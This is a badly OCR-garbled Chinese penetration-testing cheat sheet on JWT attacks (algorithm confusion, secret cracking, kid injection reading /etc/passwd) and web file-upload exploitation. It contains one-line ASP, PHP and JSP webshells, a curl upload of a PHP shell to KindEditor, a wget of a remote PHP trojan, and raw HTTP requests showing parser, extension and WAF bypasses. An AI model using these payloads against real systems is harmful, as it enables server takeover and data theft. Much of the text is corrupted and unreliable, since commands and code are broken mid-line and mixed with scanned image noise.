WUE pem 是 无 法 获取 到 的 ， 但 是 pub 却 可 以 很 容易 通过 某 些 途 径 读 取 到 ， 这 时 ， 将 JWT 的 
E 多 改 为 HMAC B 






"alg" : "HS256", 
3 typ" ， "jwt" 
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同时 使 用 获取 到 的 公 钥 pub 作为 算法 的 密 铀 ， 对 token 进 行 签名 ， 发 送 到 服务 器 端 。 


服务 器 端 会 将 RSA 的 公 钥 ( pub ) 视 为 当前 算法 (HMAC) BET, fERIHS256 8L; 
签名 进行 验证 。 


爆破 密 钥 


俗话 说 ， 有 密码 验证 的 地 方 ， 就 有 会 爆破 。 
不 过 对 JWT 的 密 钥 爆 破 需 要 在 一 定 的 前 提 下 进行 : 


。 知悉 JWT 使 用 的 加 密 算法 
。 一 段 有 效 的 、 已 签名 的 token 
。 签名 用 的 密 钥 不 复杂 ( 弱 密 钥 ) 


所 以 其 实 JWT 密 钥 爆 破 的 局 限 性 很 大 。 
相关 工具 : 
以 下 是 几 个 使 用 示例 


9:35 root Edge te ne pp Viii e: 
3 yJt hbWUiOiJhzGilpbiJ9.DvyLRUegZAyqOünlYTrcüdoYp 
root (ZopTdexBqsstbxobt70ts7 root jwt 
eyJhbGci OL J TUZTINiIsinRScCI6Ikpx 1c2VyX25hbWUi0OiJhZGipbiJ9.r oIP5ViOxheICF2201IZacLDNJ6vB 
“Santa” 


37 root©iZbpidsz8qsstbx9bt7OtsZ /root/c-jwt-cracker 
y rack eyJhbGciOiJIUZzI1NiIsInRScCIOIkpXVCJ9.eyJ1c2VyX2ShbWUiOiJhZGlpbiJ9.yJRprK3u7fzPHOQ3xtVOKgoh5iir* 


可 以 看 到 简单 的 字母 数字 组 合 都 是 可 以 爆破 的 ， 但 是 密 钥 位 数 稍微 长 一 点 或 者 更 复杂 一 点 的 话 ， 爆 
破 时 间 就 会 需要 很 久 。 


修改 KID 参 数 


kid 是 jwt header 中 的 一 个 可 选 参数 ， 全 称 是 key ID ， 它 用 于 指定 加 密 算法 的 密 钥 


{ 

calg e SHS256)2, 

"typ? $ “we; 

"kid" : "/home/jwt/.ssh/pem" 
} 


因为 该 参数 可 以 由 用 户 输入 ， 所 以 也 可 能 造成 一 些 安全 问题 。 
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数 用 于 读 取 密 钥 文件 ， 但 系统 并 不 会 知道 用 户 想 要 读 取 的 到 底 是 不 是 密 钥 文件 ， 所 以 ， 如 
对 参数 进行 过 滤 的 前 提 下 ， 攻 击 者 是 可 以 读 取 到 系统 的 任意 文件 的 。 


"typ" : "jwt", 
"kid" : "/etc/passwd" 


也 可 以 从 数据 库 中 提取 数据 ， 这 时 候 就 有 可 能 造成 SQL 注入 攻击 ， 通 过 构造 SQL 语句 来 获取 
者 是 绕 过 signature 的 验证 


"alg" : "HS256", 
E "typ" : "jwt " , 
dd: "key11111111' || union select 'secretkey' -- " 


id 参数 过 滤 不 严 也 可 能 会 出 现 命令 注入 问题 ， 但 是 利用 条 件 比较 苛刻 。 如 果 服 务 器 后 端 使 用 
Ruby， 在 读 取 密 钥 文件 时 使 用 了 open 函数 ， 通 过 构造 参数 就 可 能 造成 命令 注入 。 


Path/to/key file] whoami" 


其 他 的 语言 ， 例 如 php， 如 果 代码 中 使 用 的 是 exec RH system 来 读 取 密 钥 文 件 ， 那 么 同 
可 以 造成 命令 注入 ， 当 然 这 个 可 能 性 就 比较 小 了 。 


PRJKU/X5U S3 


U 的 全 称 是 "JSON Web Key Set URL"， 用 于 指定 一 组 用 于 验证 令 牌 的 密 钥 的 URL。 类 似 
Kid ， JKU 也 可 以 由 用 户 指定 输入 数据 ， 如 果 没 有 经 过 严格 过 滤 ， 就 可 以 指定 一 组 自 定义 的 密 
区 件 ， 并 指定 web 应 用 使 用 该 组 密 铀 来 验证 token。 


U 则 以 URI 的 形式 数 允许 攻击 者 指定 用 于 验证 令 牌 的 公 铀 证 书 或 证 书 链 ， 与 oku 的 攻击 利用 方 
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信息 泄露 


~. A 


JWT 保 证 的 是 数据 传输 过 程 中 的 完整 性 而 不 是 机 密 性 。 





由 于 payload 是 使 用 base64url 编码 的 ， 所 以 相当 于 明文 传输 ， 如 果 在 payload 中 携带 了 敏 
(如 存放 密 钥 对 的 文件 路 径 ) ， 单 独 对 payload 部 分 进行 base64url 解码 ， 就 可 以 读 取 到 
中 携带 的 信息 。 
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上 传 漏洞 
常见 脆弱 容器 上 传 方法 





| 
| 容器 
| 版 本 文件 名 
| 名 称 
WS 6.0 test.asp;.jpg ~ /test.asp/test.jpg 文 
us 7.0 test.jpg/.php 
NS TeS a.aspx.a;.a.aspx.jpg..jpg 
Oats dee lines 
Nginx — 0.7<=0.765、 Ifile.jpg9600.php 
0.8<=0.8.37 
Ii 。 ADERE 
| 。 %00 截 断 





|| 。 上 传 .htacess 分 布 式 部 署 文件 
| 。 图 片 文件 头 : 47 49 46 38 39 61 (gif) . FF D8 FF E000 10 4A 46 49 46 (jpg) ~ 89504 
47 (png) 
。 其 他 解析 格式 : cer. asa. php4. php3. php5. phtml, jspx 
。 修改 (Content-type) MIME 
。 BREF filename="../oackdoor.php" 


编辑 器 漏洞 
| 百度 编辑 器 Ueditor 





FCKeditor 
查看 版 本 


e /fckeditor/editor/dialog/fck_about.html 
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=CKeditor/_whatsnew.html 


:CKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? 
mand-GetFoldersAndFiles&Type-Image&CurrentFolder-/ 
‘CKeditor/editor/filemanager/browser/default/browser.html? 

in e-Image&connector-connectors/asp/connector.asp 
-CKeditor/editor/filemanager/browser/default/browser.html? 
rype=Image&Connector= 7 n962Ffckedit 2F 

i 1p p (ver:2.6.3 测试 通过 

-C 'CKeditor/editor/filemanager/browser/default/browser. html? 
Type=Image&Connector=connectors/jsp/connector.jsp 
Keditor/editor/filemanager/browser/default/connectors/test.html 
-CKeditor/editor/filemanager/upload/test.html 
FCKeditor/editor/filemanager/connectors/test.html 
FCKeditor/editor/filemanager/connectors/uploadtest.html 
FCKeditor/editor/fckeditor.html 不 可 以 上 传 文件 ， 可 以 点 击 上 传 图 片 按钮 再 选择 浏览 服务 器 即 
可 跳 转 至 可 上 传 文件 页 。 


Version 2.2 版 本 

hetlinux 环境 下 在 上 传 文件 后 面 加 个 .突破 ! 测试 通过 。 

Version <=2.4.2 For php 

IBPHP LEMS ATI Media ANT LAER MANSH], SBAA LERCH! 


" 


m id-"frmUpload" enctype="multipart/form-data 
BHonsz"http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?1 





Ihod-"post' '2Upload a new file:<br> 
Wput type="file" name="N ile" size="50"><br> 


Aput id="btnUpload" type=' 






" value="Upload"> 


CurrentFolder 参数 使 用 ../../ 来 进入 不 同 的 目录 


l'Owser/default/connectors/aspx/connector .aspx?Command-CreateFolder&Type-Images 
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FCKeditor/editor/filemanager/browser/default /connectors/jsp/connector | 


e Version 2.0 <= 2.2 


Sif Effasa. cer. php2. php4. inc, pwml. pht 后 缀 的 文件 上 传 后 它 保存 的 文件 直接 


KindEditor 
上 传 页 面 


e kindeditor/asp/upload json.asp 

* kindeditor/asp.net/upload json.ashx 
* kindeditor/jsp/upload json.jsp 

e kindeditor/php/upload json.php 


上 传 思 路 


kindeditor<=4.1.5 


curl -F "imgFile=@1.php" http://127.0.0.1/ 
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/kindeditor/php/upload json.p| 











传 漏洞 可 以 说 是 日 常 渗透 测试 用 得 最 多 的 一 个 漏洞 ， 因 为 用 它 获得 服务 器 权限 最 快 最 直接 。 


- 句 话 : 


al request ("kkk")%> kkk 


一 句 话 : 


ip eval($ POST[666]);?» 666 


(request .getParameter ("cat") !=null) (new java.io.FileOutputStream(application.c 


02 服务 端的 上 传 验证 
名单 验证 定义 允许 上 传 的 后 缀 类 型 ， 除 此 所 有 后 绎 都 不 允许 。 
名 单 验证 
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定义 不 允许 上 传 的 后 缀 类 型 ， 除 此 之 类 其 他 后 缀 都 可 以 上 传 。 
定义 不 允许 上 传 的 后 缀 -asp、aspx、asa、cer、cdx、ashx 
【突破 方法 】 
| 未 重 命名 可 以 配合 解析 漏洞 (很 少 ) 
| 可 以 用 cer 达 到 绕 过 效果 
| 如 果 未 用 转换 函数 强制 转换 后 缀 为 小 写 (AsP) 
| 特殊 后 缀 达到 效果 利用 ashx 来 生成 一 句 话 
htaccess 来 实现 后 缀 引导 。 上 传 jpg 可 以 解析 成 脚本 ， 具 体 在 内 容 定义 。 


3 文件 头 验证 


【突破 方法 】 每 次 测试 的 时 候 都 上 传 图 马 





4 文件 类 型 验证 
5 文件 后 缀 验证 


典型 的 白 名 单 验证 ， 指 定 上 传 后 缀 必须 为 jpg、 JPG. jpeg. JPEG 











DEBA E fe title 
R typez"text/javascript" 
lon checkFile() { 
m var flag = false: 
— var str = document. getElementByName ( file"). value; ae HU TEE 
SB str = str.substring(str.lastIndexOf( .' )*1); PREFERS 
var arr = new Array( png , bmp','gif', jpg ): =e MME LES 
for(var i=0:i<arr. length:i++) { 
if (str--arr[i]) { 














flag = true; 
} 
} 
if (!flag) { 
alert ) Y (FS). 


} 


return flag: 


上 传 绕 过 姿势 
-) 服务 器 解析 漏洞 (lIS5.x-6.x Apache Nginx IIS7.0/7.5) 


lIS5.x-6.x 解 析 漏 洞 


is5.x-6.x 版 本 的 服务 器 ， 大 多 为 windows server 2003， 网 站 比较 古老 ， 开 发 语句 一 般 为 asp; 
析 漏 洞 也 只 能 解析 asp 文 件 ， 而 不 能 解析 aspx 文 件 。 


! 和 4 析 (6.0) 


Vt. Www.xxx.com/xx.asp/xx.jpg 
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原理 : 服务 器 默认 会 把 .asp，.asa 目 录 下 的 文件 都 解析 成 asp 文 件 。 p 
文件 解析 pë 

形式 : www.xxx.com/xx.asp;.jpg 

原理 : 服务 器 默认 不 解析 ;号 后 面 的 内 容 ， 因 此 xx.asp;-jpg 便 被 解析 成 asp 文 件 了 。 
解析 文件 类 型 

IIS6.0 默认 的 可 执行 文件 除了 asp 还 包含 这 三 种 : 

ltest.asa 

/test.cer 

Itest.cdx 


目录 解析 : 


n Cg i 192.168.1.8 
Puesta @ FEL SOMA Eesm V Login- Vultrcom "S BIE—T. re C 298 






MET ASP 41 V 1.93 - 20060602 

主 菜单 
快速 查看 
ABBA 6c 

是 否 支持 ASP 
出 现 吕 下 情况 即 表 示 您 的 空 间 下 支持 ASP: | 
i arzt T TAN, | 
ib th e aa t bdsm da e ES ] 

AES SER 
服务 器 地 址 “名称 192 165.1. 5(1P:192. 165 1. 5， 端口 :35 | 
服务 器 时 间 2019-4-28 20:28:02 | 
Tisha Microsofts- IIS €0 | 
脚本 超时 时 间 90 $ | 
本 文件 路 径 C: \FebCode aspcheck 1. asp aspcheck. jpg | 
RA RIT Sy YESeript 3.9. 18702 , JSeript/5. 8. 18702 | 
服务 器 操作 系统 Tindows NT | 
全 局 和 会 aEm Application X OS Session mu 0 4 | 
ServerVariables secl a 


文件 解析 : 
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A aee n 192.168.1.8 D Act K as ipg e 
点 ”和 新 手 上 路 Damit 图 Ere V Log In - Vultr.com 党 百度 一 下 ， 你 


不 人情 只 即 表示 位 的 空间 不 支持 ss5: | 
JEHETTE o l $ | 
5ii i]: NHÉ “cet Language VBScript” %>” 的 文字 。 eke Lt 





名 称 : S‘IP-192 168. 1.8) 端口 :83 
2019-4-28 20:30:05 

Microsoft-IIS/6.0 

9o $^ 

C: WebCode aspcheck aspcheck. asp.. ipg 
VBSeript/5.8.18702 , JSerips/5. 8. 18702 


Windows NT 





Ache 解析 文件 的 规则 是 从 右 到 左 开始 判断 解析 ,如 果 后 缀 名 为 不 可 识别 文件 解析 ,就 再 往 左 判 
l test.php.owf.rar “owf" 和 "rar" 这 两 种 后 缀 是 apache 不 可 识别 解析 ,apache 就 会 把 
:php.owf.rar 解 析 成 php。 


XX.XXx.com/test.php.php123 
可 题 导致 漏洞 


Rt Apache 的 conf 里 有 这 样 一 行 配 置 AddHandler php5-script .php 这 时 只 要 文件 名 里 包 
使 文件 名 是 test2.php.jpg 也 会 以 php 来 执行 。 
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(2) 如 果 在 Apache 的 conf 里 有 这 样 一 行 配置 AddType application/x-httpd-php .jpg RIGE} A 
是 jpg， 一样 能 以 php 方式 执行 。 í 







一 个 文件 名 为 xxxx1.x2.x3 的 文件 (例如: index.php.fuck) ，Apache 会 从 x3 的 位 置 往 x1 的 位 置 
尝试 解析 ， 如 果 x3 不 属于 Apache 能 解析 的 扩展 名 ， 那 么 Apache 会 尝试 去 解析 x2 的 位 置 ， 这 样 一 
往 前 尝试 ， 直 到 遇 到 一 个 能 解析 的 扩展 名 为 止 。 


WampServer2.0AllVersion(WampServer2.0i/Apache2.2.11) 
WampServer2.1AllVersion(WampServer2.1e-x32/Apache2.2.17) 
WampbAllVersion(Wamp5 1.7.4/Apache2.2.6) 
AppServ2.4AllVersion(AppServ-2.4.9/Apache2.0.59) 
AppServ2.5AllVersion(AppServ-2.5.10/Apache2.2.8) 
AppServ2.6AllVersion(AppServ-2.6.0/Apache2.2.8) 


以 上 集成 环境 都 存在 扩展 名 解析 顺序 漏洞 ， 并 且 这 些 环境 都 存在 对 php3 文 件 按照 php 来 解析 这 个 让 
洞 。 该 方法 针对 黑 名 单 不 全 时 ， 能 够 绕 过 。 


总 结存 在 该 漏洞 的 Apache 版 本 : 


$346 2:2 3 S z X ww 


Apache2.0.x<=2.0.59 


Apache2.2.x<=2.2.17 





、 51812235. php.1111.pdf 


PASS 


LOGIN 


Es 


3. nginxf& ris: 
漏洞 原理 


Nginx 默 认 是 以 CGI 的 方式 支持 PHP 解 析 的 ， 普遍 的 做 法 是 在 Nginx 配 置 文件 中 通过 正则 匹配 
置 SCRIPT_FILENAME。 当 访问 www.xx.com/phpinfo jpg/1.php 这 个 URL 时 ，$fastcgi_script_na 
会 被 设置 为 “phpinfo.jpg/1.php”"， 然 后 构造 成 SCRIPT_FILENAME 传 递 给 PHP CGI, 但 是 PHP 为 人 
么 会 接受 这 样 的 参数 ， 并 将 phpinfo.jpg 作 为 PHP 文 件 解析 呢 ? 这 就 要 说 到 fix_pathinfo 这 个 选项 J。 
如 果 开启 了 这 个 选项 ， 那 么 就 会 触发 在 PHP 中 的 如 下 逻辑 : 


PHP 会 认为 SCRIPT_FILENAME 是 phpinfo.jpg， 而 1.php 是 PATH_INFO， 所 以 就 会 将 phpinfojpgi 
为 PHP 文 件 来 解析 了 
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+ - $ w 


wxx.com/UploadFiles/image/1.jpg/1.php 
xxxx.com/UploadFiles/image/1.jpg%00.php 


XX) .com/UploadFiles/image/1.jpg/9620Y0.php 
Ec «(n 
EXPO Lt Oli eel em ''nini$2n W> rr | Wells de ci rd %0 OH NIKON CC 

9, 1/9 «o d!d-dGd?d-d« 9 K.9 19 OO > 99 FUSE! 099022114 INU th i99 5 59 vi 

j49*9 99.281699. 169 9- De 01000 VeE 9 eie QO Ot Ot HONS! Ong 
WW Up n rdi 9199999 bif rrinin ^ rr, SACD Systems 9152149 2009:07:14 1 
( OO Oil icri 1-025 rth tH gn P 1214-102 q3 
&07456789;C DEF GHUSTUVWXY  cdefghijstuvvxy2649 9999699999999 999999999999964 
[Uo J nwn tE [1-IAQeaq200189 4999 «389b 
956911 I-80*56789:C DEFGHUSTUVWXY: cdefghijstuvwxy29999999999990909090999999999999 
$9^w9199919u 1/9. €990119/6.0990-0999:99x6-/19999976 1069/9 99/0€9H69-^.9::94 
GODOU wRe99lJ-i 9x9199099995^ 0000: :OO 000 -69190|99P10-990lV.-9|WU9 96 
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)-69971909v'66769191099.9:-99 9999111 69h699919.009/99509 OY 911*9092-,9?0 
019 Kc Ré wcié 4-9 -193099/099799'19919:1959/1n69. 09919919099 19-9099 1991 
Z «6$1«9i/99199-W9de990m 93291699 09911999 9:9)v-9:979999099 OOOO 
$919192:9709.w-e97/749991 90799099 *:919919209*9099999 99 9- 990299 9 9 
e pe k @@' 9 €99mb9 19 wwOee919H-9 x99-97999 79-99 w99999 99 19 Tw 1 
4 NEF@IKS HELKO © X6971999919990991099993991999 099999v 191 V 
v4 $10 /OuOvOOXOTOO>FOOKIOGO® AlO 11 OOOO OOOZIDI OO j | + = Oi Ozh OPOOOI 
OKO SOO00 OO O)OO585 GLO: OOOH O19 OZ &m999910912//991H9:9 y - 919609 € 
eP2q[4194 19/9 Né. 94j0E 6 LON O 9aq9 Dx3909 00099 (69999609 “0/0 7199919: 
u.[9]N8-9E99104Y999309(0^99 ".pFs919999 OO< (0 19° OOOO Pe L0e1-9'1409K9» ©. 
Jael$91019 -Or > OO O' ON OOlOO3 OOS [11OOM Ora LOUSH’?OVOCUSSO> USD 99,199-19^ 
HOOD + OO OK2OxGOV/ + IO KOO OOO 5OO192OyOOOOOM 438\F 19 OSUSOIOH - OOVIROI 
; H69t699069 00y000 Of- OX O6COOOT-O OOO 199 VOHOO*OOh1 
MI90I0I00XMI596001J09009F000094o960nmn0960kk0L-85900091 19929199199! 
O2012OWO KT -VO- 9O}OOOOP ONG OOOO OK O00000 -OO 069 979999-9 999 YOO: 
y" q6999*p6946 9119U9999990u.9 > dcq49^999^W999meuvu9 9979/09999 
Eee 499/9995P95.900969m19w699-799919(9pv9^j6e5| 919909» W«319 OOO - 
hé 1049/6 98997 961669699 65-6969 6:9/199-16091K0994N [14 


is7.5 解 析 漏洞 


D .5 是 对 php 解 析 时 有 一 个 类 似 于 Nginx 的 解析 漏洞 ， 对 任意 文件 名 只 要 在 URL 后 面 追加 上 字符 
任意 文件 名 .php” 就 会 按照 php 的 方式 去 解析 。 (例如 : webshell.jpg/x.php) 


7.0(Win2008R1+1IS7.0) 
*"S(Win2008R2-1S7.5) 


的 解析 漏洞 不 像 Apache 那 么 模糊 ， 针对 IIS6.0， 只 要 文件 名 不 被 重 命名 基本 都 能 搞定 。 这 里 要 注 
点， 对 于 "任意 文件 名 /任意 文件 名 .php"” 这 个 漏洞 其 实 是 出 现 自 phhp-cgi 的 漏洞 ， 所 以 其 实 跟 IIS 
是 无 关 的 。 


(=) 文件 扩展 名 绕 过 (asp aspx php jsp) 


| asp 
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HIIS 5.0/6.0 


# 文 件 解析 


asp; .jpg 


.asp.jpg 


.asp; jpg 


# 有 目录 解析 


.asp/1.jpg 


Ci 


# 大 小 写 绕 过 


asPx 


# 截 断 


1.asp%00.jpg 


wt re ee LL 


# 空 格 绕 过 





1.asp .jpg 
i.asp .jpg 。 (_ 代 蔡 空 格 ， 只 在 windows 下 有 效 。 因 为 windows 系 统 自动 去 掉 不 符合 规则 符号 后 面 
# 黑 名 单 绕 过 (替代 asp ) : 

1156.0 默认 的 可 执行 文件 除了 asp 还 包含 这 三 种 : 
asa 

cer 


cdx 
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ER 





71.1 TE 
-159,199 [2 
Mexilla/$.b (Macintosh; Intel Mac OF ) 12; 






closa 
2? Nov 






rv:50.0) Goacko 20100L0L 2016 15:50:54 gxt 


l,nppliention xhtmlexpl,application srel;qw0.9,* 0 








X sh-CH, «5970.8, on-08:q»0. 5, an;qe0.3 »te 
35 grip, det ince | Content-Type: 
1//102.160.199.129/form Get-Cookie: AZPOROGIONIOQCQCODTBeGPFBGAIDLLÁLHUIIGCPIPMPI; path= 
9 Beshioh v rifys46510a8c pleis Bffé62542f05; Cache-control: private 
IBESAGO« E rH pA Dr pr IPF 


IQUCDOLCKIOOPILFBOFODA11GGDAOHDUB; eesuppowerel; <html>» 
COBH COFLEAUBIOT! STRAP GRY “henio 
INOMROINALPRATALPLMLT i =titis»Uplosd“ ti 


mota content text/html” peharsete uttag 


T s: d 
pare {or Ant ny E E T TENS 
“u filel » 


ues upload 


47146314211411 





11852555099 nano: 








111461142 


E. 1852555069 
Bition: fora-deta: nane 





Ail | tal» 
@pplicaticon octet -atrear Vile sheli.esp Success Upload !-br> 
cally 
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#IIS 5.0/6.0 


文件 解析 


.aspx; ,jpg 


aspx. jpg 


.aspx; jpg 





---=- = 








i .aspx/1. jpg 





ee ee a a = 








# 大 小 写 绕 过 








Il | asPx 
































Il Il # 空 格 绕 过 


| 1.aspx .jpg 





Wl 1.aspx_.jpg ( 代替 空格 ， 只 在 windows 下 有 效 。 因 为 windows 系 统 自动 去 掉 不 符合 规则 符号 后 面 


人 





Wi # 黑 名 单 绕 过 (替代 aspx) : 





II cer 




















MI cdx 


ashx (生成 aspx 文 件 ， 见 waf 绕 过 ) 
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E 


# 黑 名 单 绕 过 (替代 php ) : 
phpi 

php2 

php3 

php4 

php5 

# 空 格 绕 过 (只 在 windows 下 有 效 。 因 为 windows 系 统 自动 去 掉 不 符合 规则 符号 后 面 的 内 容 ) 
1.php . 

1.php. 

1.php. 

1.php .jpg 

1.php_.jpg (RBS) 

1.php.jpg 

1.php. jpg 

i.php. ,jpg 

111. php&amp; #x2e; jpg 

# 十 六 进 制 绕 过 点 绕 过 
1. php&#x2e; jpg 


in Vd ed em ee ee 





人 四 了 


php (nginx) 


5.123 (apache) 


lI [D ------- - - ee ee ee eee 









f :htaccess:( 仅 在 Apache, 例如 a_php .gif， 会 被 当成 php 执 行 。 ) 
access 内 容 

llesMatch " php.gif'» 

etHandler application/x-httpd-php 


FilesMatch> 
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#IIS _ put 上 传 


# 文 件 包含 绕 waf( 见 6、 文 件 包含 绕 过 ) 


4、jsp 
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E * $ ed 
2 
绕 过 (替代 jsp ) 
It.Ef& (Apache Tomcat 7.0.0 - 7.0.81) 
PUT /testi.jspX20 HTTP/1.1 
DATA PUT /test2.jsp::$DATA HTTP/1.1 


PUT /test3.jsp/ HTTP/1.1 


PUT 7test3.Jsp. HTTP/1.1 











iT 上 传代 码 。 有 exp 可 利用 

| /testi.jspX20 HTTP/1.1 

E localhost:8080 

?r-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/ 
cept: text/html,application/xhtml*xml,application/xml;q-0.9,*/*;q-0.8 
BDt-Language: zh-CN, zh; q=0.8, en-US; q=0.5, en; q=0.3 

p ection: close 


grade-Insecure-Requests: 1 
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«9*out.print("test");9» 


xt 


1. Content-Disposition 


1. 4form-data; 


2. Wifüform-data 为 * 


3、 将 form-data; name="file"; 


4、 将 Content-Disposition: form-data 


5、 将 Content-Disposition 


5、filename 回 车 =“1,php” 


6、filename=”1.php 回 车 " 


7. filename="1.jpg";filename="1. php" 


8. Content -Disposition 


(=) Content-Disposition、content-type、 文 件 内 容 检测 、 
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修改 为 ~form-data 


BU: Content -Disp 


nl 


修改 为 content-Disp 


(过 阿里 云 waf) 


(过 百度 云 waf ) 






:application/octet-stream 


Content -Type 修改 为 image/gif， 或 者 其 他 允许 的 类 型 。 


除 掉 ontent -Type: image/jpeg 只 留 下 c， 将 .php 加 c 后 面 即 可 ， 但 是 要 注意 额 ， 双 引号 要 跟着 c .p 


& Content-Type 修改 为 content -Type 


$ Content-Type: application/octet-stream 冒号 后 面 增加 一 个 空格 
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POST /upload_file. php HTTP /1. : 1 

Hoste lets 0-008 T 
Content-Length: 478 

Cache-Control: max-age=0 

Accept: 

text/html, application/xhtmlexnl, application/xml ;: q=0. 9, image /webp, */*: q=0.8 
Origin: http://127.0.0.1 (pi) 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) &ppleWebKit/537.36 (KHTNL, lil 
Gecko) Chrome/45.0.2454. 101 safari/537, 368 
Content-Type: multipart/form-data; boundary=—— 
WVebKitFormBoundaryHjqyS5FT7Gj5x4GYBG 

Referer: http://127.0.0. 1/form. html 
Accept-Encoding: zzip, deflate 

Accept-Language: zh-CN, zh. q=0.8 

Cookie: safedog—flow-item= 

Connection: close 









VebKitFormBoundaryHjqy5FTG35xAGYBG 

Content-Disposition: form-data; name- file"; | EE 
filename= Y$2)X]WFOVR) 3V1EMTOTWAR. png” r^ re A] 又 件 
Content-Type: image/png Suey rea. 


nl EN Bnrm (Fla moe Blinn 


Q 
Qua Y 
NON IRI ee a te er ek sn Mf Sn ae mel Ma Hk ACAI p Ne ne Mat fused d 


WebKitFormBoundaryHjqySF7G75xaGYBG 
Content-Disposition: form-data; name= file ， filename=“ian. php” 
Content-Type: application/octet-stream 








<?php VR hn à -e SHE 
phpinfo () ; UN JH Hy M. Hr 
15 





WebKitF ormBoundaryHjqy5F 1G75x4GYEG 
Content-Disposition: form-data; name= submit” 


ea? 这 





WebKi tFormBoundaryHj qySF 7G] 5x4GYBG— 


(四 ) 客户 端 绕 过 


选择 一 个 禁止 上 传 类 型 的 文件 上 传 ， 当 点 击 确 定 按钮 之 后 ， 浏 览 器 立即 弹 窗 提示 禁止 上 传 ， 一 般 就 
可 以 断定 为 客户 端 JavaScript 检 测 ， 进 一 步 确定 可 以 通过 配置 浏览 器 HTTP 代 理 (没有 流量 经 过 代理 
就 可 以 证 明 是 客户 端 JavaScript 检 测 ) o 


绕 过 方法 : 
上 传 页 面 ， 审 查 元 素 ， 修 改 JavaScript 检 测 函数 ，; 


将 需要 上 传 的 恶意 代码 文件 类 型 改 为 允许 上 传 的 类 型 ， 例 如 将 dama.asp 改 为 dama.jpg 上 传 ， 配 置 
Burp Suite 代 理 进行 抓 包 ， 然 后 再 将 文件 名 dama.jpg 改 为 dama.asp。 


上 传 webshell.jpg.jsp， 可 能 前 端 程序 检查 后 缀 时 ， 从 前 面 开 始 检查 。 
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4 WAF 绕 过 EE 


ike 










itent -Disposition : form-data; name="upload"; 


Lename---" 11111 


:$. get[x]; $x 


JXXx.com?x-wget github 的 php 大 马 地 址 





tent -Disposition: form-data; name="upload"; filename==="11111.php" 


XM 


Y ent-Disposition: form-data; name="upload"; filename=11111.php 


绕 过 


Atent-Disposition: form-data; name="upload"; filename="11111.php 


,php+ 回 车 ， 这 样 引号 就 在 另 一 行 。 同 时 上 传 内 容 的 一 句 话 前 面 加 个 中 文字 符 
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Content-Type: text/html ; 





aec /13e543e035£a71483973713 
7f40445021483673757,140403* nnectiónt. close 
FYKPjp4S7eUnUHCOoltSagpnHeSCA: è Server yunjiasu-ngins 
SAI LOENREMLG = CF-RAY: 31ef0*df075803f 
Content-Length: 9S 











opu reward lo 
$a lpvt eda*fibaté 





tipt 
tiş 


21404039590 
emnection: close language*'javascript ' ”parent 


0501184039874 php )- 





Ipgrade-Insecure-Fequests: l 
lontent~Type: multipart /fors-data; 


pt» 


















)oundarymeme mme 20755127712617 
‘ontent -Length: 25104 








emp img 








ont ent -Disposit 
siename=" 2. php 





i 
| 
| 
Í 

TDontent-Disposition. fors-data, namez"op" | 
= | 


一 









































Cookie. / cfduidsdSad*bt*4blStbcflaec714eb47 a à HTIP/1.1 200 OF 
Hm lve edaSflba 11db1937f404450514 €500; r Date: Tue, 10 Jan >01? OS: 24:18 
topu authse FxMn I Content-Type. text/html harset 

EasYni* Connection: close 
topu loginusers | erver: yunjiasu-nginx 
topu reward logs*dayl | CF-RAY: 3lef1370f5dc2f7 

 eda*flba967a 365€ | Content-Length: $9 

"iN 
ript 
multipart /form-data, Language  avascript ' »parent 
van eg cin ha merlot reece oo 30759127712617 i 0501484040754 php ) 77 ry 


Content-Disposition: form-data; name=" 





temp img 





ontent-Disposition:. form-data; 
filenames"2. php 





nam 


crop file"; 


----30759127712617-- 


Content-Disposition: form-data; name-"up picture"; filename="yjh. 


ce php" 


Cookie: ad 


Connection: 






html zalns= http://www, w3. org/ 1999 /xhtn]l 


Upgrade~Insecure-Requests: 1| 


tentz "text/html 





ta http-equiv- Content-Type 


rset-GEK 













ead 
Content~Disposition: form-data: names up picture 
filenames chinacycc. body style= text-align: center 
YR actione method= post enctype= multapart/t 





f 
i Warning b : strstr() expects at least 2 
[ parameters, I given in 
C:XphpStudy V WWW index. php on line 19 
File---chinacycc. C. php--Successful--117512 br 
DQML 
tal 
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05 实战 分 析 a 
通过 上 传 zip 模 板 后 服务 器 自 解压 获取 webshell 











ezz php 一 癌 活 E 





那么 在 10000003 目 录 下 ， 就 会 有 我 们 的 大 马 和 一 句 话 木马 。 


2、 黑 名 单 绕 过 之 文件 名 可 控 
































8. 高 并 发 绕 过 上 传 总 结 (条 件 竞争 ) 


upload-labs 和 靶场 有 环境 


4. 路 目录 上 传 绕 过 waf 


访问 aspyx 马 
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MANESH & HE IM 


为 提供 更 好 及 更 安全 的 服务 ! 
本 网 站 限定 使 用 SSLIO 空 速 引 ! 


BAIR 5 秒 ， 由 系统 为 你 自动 但 按 ， sane. HE 


或 将 网 址 之 http (Ce Ahttps (ii seris + 





Comme; Denes G Googe SRF. RN C 


A Ba roga 








Taspx.aspx 


wo ED eee S Googe & AR—K. Caec 


RPM RC, 


aN 





(人 无 法 理解 该 网 址 


Firefox 不 烛 道 如 侈 打开 这 个 地 址 | d 


* 人 


首先 ， 我 们 考虑 是 不 是 因为 一 句 话 的 内 容 被 waf 识 别 ， 导 致 无 法 访问 。 那 么 把 内 容 改 为 11111 试 试 


» 1€673203019744 
Content-Disposition: form-data: name""fuFile 1"; filenamwe*""illl.aspx" 


f'ontent - Type image/3peg 
1111111111111111111 
4 
nt-Dispos x lata ^r fil i x 
ent«Type ADI at tete-etpea 
4 
te Dame f iata n File filename" 
CE 
PARR @ 新 于 上 路 采用 网址 Pere O Googe CNET CAR C 












为 提供 更 好 及 更 安全 的 服务 1 
FSPWALRE HASSLE ENS ! 

BRIAR 1S ioi AT ENMERUS » 

ates Se = http (ek 为 htps (eR PIRE + TF 
DERE UT RAEN : 


那么 是 不 是 因为 aspx 后 缀 的 原因 ?尝试 上 传 txt 试 试 
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(https) CCE | ARAL RSET 





共 该 协议 的 地 直 


THRE RRA 










Eso 


EC @ x 

E — - py t * 
epee @ ilm CX Pett G Googe CO BRT. Ge “7 TERADE.. 
Tu 


lj 步 判定 是 aspx 后 绥 的 缘故 ， 导 致 被 拦截 。 那 么 尝试 其 他 脚本 后 绥 。 
‘asp,asa,cer,cdx,ashx,asmx 


a T 


SEL ONES está 0 Googie Bm, RKS (mgri C Re 





